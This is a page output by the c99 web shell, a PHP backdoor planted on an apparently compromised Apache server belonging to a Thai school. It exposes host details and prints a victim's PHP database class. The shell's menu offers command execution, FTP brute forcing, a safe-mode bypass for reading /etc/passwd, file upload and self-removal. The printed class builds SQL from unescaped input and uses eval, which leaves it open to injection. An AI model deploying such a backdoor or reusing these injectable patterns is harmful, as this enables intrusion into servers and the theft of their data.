!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/class/   drwxr-xr-x
Free 52.38 GB of 127.8 GB (40.99%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     clsDocLineConfig.php (7.31 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//--Class person--------------------------
//--PK of person ::
//	1. personId
include_once "../link/keyThai.php";
class DocLineConfig extends clsDB{

var $result;

var $DlcID;
var $deptId;
var $DlpID;
var $personId;
var $DlcSeq;
var $DlcPropose;
var $DlcSign;
var $DlcSend;
var $DlcByPass;
var $DlcView;
var $docGroup;
var $confirm;
var $DlcActive;


function DocLineConfig(&$c){
	$this->c=$c->c;
	$this->DB=$c->db;
}

function Save(){
	if ($this->status==1){
		//uncomment a line below if your table use ID as running number
		$this->DlpId=$this->GetNextCode();
		$sql = "insert into DocLineConfig values(
			'".th2a($this->DlcID)."',
			'".th2a($this->deptId)."',
			'".th2a($this->DlpID)."',
			'".th2a($this->personId)."',
			'".th2a($this->DlcSeq)."',
			'".th2a($this->DlcPropose)."',
			'".th2a($this->DlcSign)."',
			'".th2a($this->DlcSend)."',
			'".th2a($this->DlcByPass)."',
			'".th2a($this->DlcView)."',
			'".th2a($this->docGroup)."',
			'".th2a($this->confirm)."',
			'".th2a($this->DlcActive)."'
			)";
	}else {
		$sql = "update DocLineConfig set 
			deptId='".th2a($this->deptId)."',
			DlpID='".th2a($this->DlpID)."',
			personId='".th2a($this->personId)."',
			DlcSeq='".th2a($this->DlcSeq)."',
			DlcPropose='".th2a($this->DlcPropose)."',
			DlcSign='".th2a($this->DlcSign)."',
			DlcSend='".th2a($this->DlcSend)."',
			DlcByPass='".th2a($this->DlcByPass)."',
			DlcView='".th2a($this->DlcView)."',
			docGroup='".th2a($this->docGroup)."',
			confirm='".th2a($this->confirm)."',
			DlcActive='".th2a($this->DlcActive)."'
			where DlcID='".th2a($this->DlcID)."'";
	}
	return $this->Dml($sql);
}

function Delete(){
	return $this->Dml("delete from DocLineConfig where DlcID='$this->DlcID'");
}

function GetNextCode(){
	$this->SetQuery("select max(DlcID) as num from DocLineConfig");
	if ($result=$this->GetResult()) {
		return $result['num']+1;
	}
}

function RSdocLineConfig(){
	$this->SetQuery("select * from DocLineConfig order by DlcID");
}

function GetRecord(){
	$numFields = $this->NumField();
	$row = $this->GetResult();
	if ($row){
		for ($i=0; $i<$numFields; $i++){
			eval("\$this->".mysql_field_name($this->rs, $i)."=\$row['".mysql_field_name($this->rs, $i)."'];");
		}
		return true;
	}else{	// clear value of Member;
		for ($i=0; $i<$numFields; $i++){
			eval("\$this->".mysql_field_name($this->rs, $i)."='';");
		}
		return false;
	}
}
function SearchByKey($xKey){
	if ($this->SetQuery("select * from DocLineConfig where DlcID= '$xKey'")){ 	
		return 1;
	}else {
		return 0;
	}
}
//****************** You can add new functions below **********************//
function SearchByDeptMaxDocGroup($xKey,$yKey){
	if ($this->SetQuery("select * from DocLineConfig where deptId = '$xKey' and docGroup='$yKey' order by DlcSeq asc")){ 
		return 1;
	}else {
		return 0;
	}
}
function SearchMaxDeptDlc(){
	$this->SetQuery("select max(DlcID) as num from DocLineConfig");
	if ($result=$this->GetResult()) {
		return $result['num'];
	}
}
function SearchMaxDlc(){
	$this->SetQuery("select max(DlcID) as num from DocLineConfig");
	if ($result=$this->GetResult()) {
		return $result['num'];
	}
}
function SearchMaxDocGroup(){
	$this->SetQuery("select max(docGroup) as num from DocLineConfig");
	if ($result=$this->GetResult()) {
		return $result['num'];
	}
}
function SearchMaxDeptDlcSeq($xKey){
	$this->SetQuery("select max(DlcSeq) as num from DocLineConfig where deptId = '$xKey'");
	if ($result=$this->GetResult()) {
		return $result['num'];
	}
}
function SearchDeptconfirm($xKey){
	$this->SetQuery("select confirm as num from DocLineConfig where deptId = '$xKey' group by deptId");
	if ($result=$this->GetResult()) {
		return $result['num'];
	}
}
function SearchByPsPositionDlpID($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' group by deptId , DlpID<br>";
	if ($this->SetQuery("select * from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' group by deptId , DlpID")){ 
		return 1;
	}else {
		return 0;
	}
}
function SearchDlcIDByPsPositionDlpID($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' group by deptId , DlpID<br>";
	if ($this->SetQuery("select DlcID from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' group by deptId , DlpID")){ 
		return 1;
	}else {
		return 0;
	}
}
function SearchByPsPositionDlpIDActiveY($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' and DlcActive='Y' group by deptId , DlpID<br>";
	if ($this->SetQuery("select * from DocLineConfig where personId='$xKey' and confirm='Y' and DlpID='$yKey' and docGroup ='$zKey' and DlcActive='Y' group by deptId , DlpID")){ 
		return 1;
	}else {
		return 0;
	}
}
function SearchByNextDlcID($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where DlcSeq='$xKey' and docGroup='$yKey' and deptId='$zKey'<br>";
	if ($this->SetQuery("select * from DocLineConfig where DlcSeq='$xKey' and docGroup='$yKey' and deptId='$zKey'")){ 
		return 1;
	}else {
		return 0;
	}
}
function SearchByDocGroupDlcID($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and DlpID='$zKey'";
	if ($this->SetQuery("select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and DlpID='$zKey' ")){ 
		return 1;
	}else {
		return 0;
	}
}
function SearchByDocGroupDlcID2($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and DlpID='$zKey'";
	if ($this->SetQuery("select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and (DlpID='5' || DlpID='11' || DlpID='15' || DlpID='18' || DlpID='28' || DlpID='30' || DlpID='32'  || DlpID='34' || DlpID='36' || DlpID='38') ")){ 
		return 1;
	}else {
		return 0;
	}
}
function SearchDlc2($xKey,$yKey,$zKey){ 
if($yKey=="0"){
	$xKey=$xKey+1;
}else{
	$xKey=$xKey-1;
}
	$this->SetQuery("select DlcID as num from DocLineConfig where DlcSeq='$xKey' and deptId='$zKey'");
	if ($result=$this->GetResult()) {
		return $result['num'];
	}
}
function SearchDlcID11($xKey,$yKey){
	if ($this->SetQuery("select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and DlpID='11' ")){ 
		return 1;
	}else {
		return 0;
	}
}
function SearchDlcIDDlpID($xKey,$yKey){
//echo "select * from DocLineConfig where deptId='$yKey' and DlpID='$xKey' ";
	if ($this->SetQuery("select * from DocLineConfig where deptId='$yKey' and DlpID='$xKey' ")){ 
		return 1;
	}else {
		return 0;
	}
}
function SearchByKeyName($xKey,$name){
	$this->SetQuery("select $name as name from DocLineConfig where DlcID= '$xKey'");	
	if ($result=$this->GetResult()) {
		return $result['name'];
	}
}
function SearchDlcIDByDocGroupDlcID2($xKey,$yKey,$zKey){
//echo "select * from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and DlpID='$zKey'";
	if ($this->SetQuery("select DlcID from DocLineConfig where docGroup='$xKey' and deptId='$yKey' and (DlpID='5' || DlpID='11' || DlpID='15' || DlpID='18' || DlpID='28' || DlpID='30' || DlpID='32'  || DlpID='34' || DlpID='36' || DlpID='38') ")){ 
		return 1;
	}else {
		return 0;
	}
}
} //--End class person--

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--